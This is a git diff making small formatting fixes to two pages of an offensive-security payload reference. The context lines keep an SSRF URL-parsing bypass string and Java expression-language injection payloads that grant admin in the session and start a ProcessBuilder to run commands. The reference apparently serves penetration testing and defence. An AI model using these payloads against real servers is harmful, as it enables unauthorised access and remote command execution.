diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 091de3b..34a6bd9 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -271,12 +271,12 @@ http:127.0.0.1/ ![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true) -Parsing behavior by different libraries: `http://1.1.1.1 &@2.2.2.2# @3.3.3.3/` +Parsing behavior by different libraries: `http://1.1.1.1 &@2.2.2.2# @3.3.3.3/`. * `urllib2` treats `1.1.1.1` as the destination * `requests` and browsers redirect to `2.2.2.2` * `urllib` resolves to `3.3.3.3` -* Some parsers replace http:127.0.0.1/ to http://127.0.0.1/ +* Some parsers replace `http:127.0.0.1/` to `http://127.0.0.1/` ### Bypass PHP filter_var() Function diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md index 397ee99..4f6d898 100644 --- a/Server Side Template Injection/Java.md +++ b/Server Side Template Injection/Java.md @@ -446,7 +446,7 @@ ${pageContext.request.getSession().setAttribute("admin",true)} ${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())} ${request.getAttribute("a")} ``` - + - Error-Based payload: ```java